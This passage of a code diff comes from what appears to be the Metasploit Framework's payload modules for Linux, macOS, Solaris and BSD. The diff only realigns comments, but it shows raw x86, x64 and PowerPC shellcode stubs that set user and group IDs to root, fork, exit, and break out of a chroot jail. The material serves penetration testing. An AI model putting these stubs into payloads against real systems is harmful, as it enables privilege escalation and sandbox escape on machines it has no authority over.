"\x0f\x05" # syscall
|
||||
app << "\x48\x31\xc0" + # xor rax, rax
|
||||
"\x48\x83\xc8\x01" + # or rax, 1 (exit=1)
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -59,70 +59,70 @@ module X86
|
|||
def handle_x86_bsd_opts(pre, app)
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x66\xb8\x37\x01" + # movw $0x0137,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7e" +# movb $0x7e,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7e" + # movb $0x7e,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x17" +# movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x17" + # movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x66\xb8\x38\x01" + # movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7f" + # movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\xb5" + # movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x01" +# movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
app << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x01" + # movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -99,113 +99,113 @@ module Msf::Payload::Linux
|
|||
# Prepend
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
pre << "\x6a\x02" +# pushb $0x2 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 ; fork #
|
||||
"\x85\xc0" +# test %eax,%eax #
|
||||
"\x74\x06" +# jz 0xf #
|
||||
"\x31\xc0" +# xor %eax,%eax #
|
||||
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x6a\x02" + # pushb $0x2 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 ; fork #
|
||||
"\x85\xc0" + # test %eax,%eax #
|
||||
"\x74\x06" + # jz 0xf #
|
||||
"\x31\xc0" + # xor %eax,%eax #
|
||||
"\xb0\x01" + # movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xa4" +# movb $0xa4,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\xf7\xe3" + # mull %ebx #
|
||||
"\xb0\xa4" + # movb $0xa4,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x46" + # pushl $0x46 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x17" +# pushl $0x17 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x17" + # pushl $0x17 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xaa" +# movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\xf7\xe3" + # mull %ebx #
|
||||
"\xb0\xaa" + # movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x47" +# pushl $0x47 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x47" + # pushl $0x47 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x2e" +# pushl $0x2e #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x2e" + # pushl $0x2e #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x46" + # pushl $0x46 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
|
||||
# break chroot
|
||||
pre << "\x6a\x3d" +# pushl $0x3d #
|
||||
pre << "\x6a\x3d" + # pushl $0x3d #
|
||||
# build dir str (ptr in ebx)
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
# mkdir(dir)
|
||||
"\x6a\x27" +# pushl $0x27 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x6a\x27" + # pushl $0x27 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
# chroot(dir)
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x89\xd9" + # movl %ebx,%ecx #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
# build ".." str (ptr in ebx)
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
|
||||
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x66\x68\x2e\x2e" + # pushw $0x2e2e #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
# loop changing dir
|
||||
"\x6a\x3d" +# pushl $0x1e #
|
||||
"\x59" +# popl %ecx #
|
||||
"\xb0\x0c" +# movb $0xc,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xe2\xfa" +# loop -6 #
|
||||
"\x6a\x3d" + # pushl $0x1e #
|
||||
"\x59" + # popl %ecx #
|
||||
"\xb0\x0c" + # movb $0xc,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xe2\xfa" + # loop -6 #
|
||||
# final chroot
|
||||
"\x6a\x3d" +# pushl $0x3d #
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
"\x6a\x3d" + # pushl $0x3d #
|
||||
"\x89\xd9" + # movl %ebx,%ecx #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
|
||||
end
|
||||
|
||||
# Append exit(0)
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x58" +# popl %eax #
|
||||
app << "\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x01" + # pushl $0x01 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
|
@ -216,65 +216,65 @@ module Msf::Payload::Linux
|
|||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xa5" + # addi r0,r31,-347 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x18" + # addi r0,r31,-488 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" + # addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" + # addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" + # addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
|
||||
# EEK! unsupported...
|
||||
end
|
||||
|
@ -282,10 +282,10 @@ module Msf::Payload::Linux
|
|||
# Append exit(0)
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
app << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x02" + # addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
elsif (test_arch.include?(ARCH_X64))
@ -78,48 +78,48 @@ module Msf::Payload::Osx
|
|||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7e" +# movb $0x7e,%al #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7e" + # movb $0x7e,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x17" +# movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x17" + # movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7f" + # movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\xb5" + # movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x01" +# movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
app << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x01" + # movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -127,56 +127,56 @@ module Msf::Payload::Osx
|
|||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x7e" + # or r8, 126 (setreuid=126)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x17" + # or r8, 23 (setuid=23)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x7f" + # or r8, 127 (setregid=127)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x17" +# shl r8, 23
|
||||
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
|
||||
"\x49\xd1\xe0" +# shl r8, 1
|
||||
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x17" + # shl r8, 23
|
||||
"\x49\x83\xc8\x5a" + # or r8, 90 (setgid=181>>1=90)
|
||||
"\x49\xd1\xe0" + # shl r8, 1
|
||||
"\x49\x83\xc8\x01" + # or r8, 1 (setgid=181&1=1)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
app << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x01" + # or r8, 1 (exit=1)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
end
@ -75,55 +75,55 @@ module Msf::Payload::Solaris
|
|||
if (test_arch.include?(ARCH_X86))
|
||||
|
||||
# Syscall code
|
||||
sc = "\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
|
||||
"\x6a\x65" +# pushl $0x65 #
|
||||
"\x89\xe6" +# movl %esp,%esi #
|
||||
"\xf7\x56\x04" +# notl 0x04(%esi) #
|
||||
"\xf6\x16" # notb (%esi) #
|
||||
sc = "\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #
|
||||
"\x6a\x65" + # pushl $0x65 #
|
||||
"\x89\xe6" + # movl %esp,%esi #
|
||||
"\xf7\x56\x04" + # notl 0x04(%esi) #
|
||||
"\xf6\x16" # notb (%esi) #
|
||||
|
||||
# Prepend
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xca" +# movb $0xca,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\xca" + # movb $0xca,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x17" +# movb $0x17,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x17" + # movb $0x17,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xcb" +# movb $0xcb,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\xcb" + # movb $0xcb,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x2e" +# movb $0x2e,%al #
|
||||
